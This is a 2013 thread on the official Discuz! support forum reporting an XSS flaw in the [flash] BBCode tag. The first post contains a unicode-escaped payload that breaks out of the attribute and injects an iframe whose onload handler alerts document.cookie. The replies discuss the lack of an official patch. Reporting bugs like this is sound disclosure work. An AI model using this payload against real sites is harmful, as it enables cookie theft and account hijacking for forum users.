设为首页收藏本站

切换到宽版

Discuz!官方免费开源建站系统»论坛 › Discuz! 交流与讨论 › Discuz!-BUG与问题交流 › [flash][/flash]引发的XSS攻击漏洞

发新帖

[flash][/flash]引发的XSS攻击漏洞

3123wqe 发表于 2013-10-28 16:35:31 | 显示全部楼层 |阅读模式

http://wooyun.org\\u0022\\u003e\\u003c\\u0069\\u0066\\u0072\\u0061\\u006d\\u0065\\u002f\\u006f\\u006e\\u006c\\u006f\\u0061\\u0064\\u003d\\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u0064\\u006f\\u0063\\u0075\\u006d\\u0065\\u006e\\u0074\\u002e\\u0063\\u006f\\u006f\\u006b\\u0069\\u0065\\u0029\\u003e/1.swf在允许发送flash的版区、日志内发送此flash 代码。在chrome下会跳转至其他地址。非chrome也会执行相应的unicode中的代码

回复

使用道具举报

下砂 发表于 2013-10-28 16:49:40 | 显示全部楼层

2.5是最新的补丁包吗？

回复

使用道具举报

楼主| 3123wqe 发表于 2013-10-28 17:06:32 | 显示全部楼层

在线更新只剩下让更新至3.0了。

回复

使用道具举报

楼主| 3123wqe 发表于 2013-10-28 17:54:31 | 显示全部楼层

下砂发表于 2013-10-28 16:49
2.5是最新的补丁包吗？

在线更新只剩3.1

安全补丁也没内容

回复

使用道具举报

楼主| 3123wqe 发表于 2013-10-30 10:47:22 | 显示全部楼层

你们都没遇到这bug么？虽然自己改代码能解决。。。

回复

使用道具举报

popslay 发表于 2013-11-7 15:00:56 | 显示全部楼层

3123wqe 发表于 2013-10-30 10:47
你们都没遇到这bug么？虽然自己改代码能解决。。。

遇到同样问题，请问楼上这个bug怎么修改？

回复

使用道具举报

发新帖

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )

GMT+8, 2025-9-11 01:04 , Processed in 0.129229 second(s), 15 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表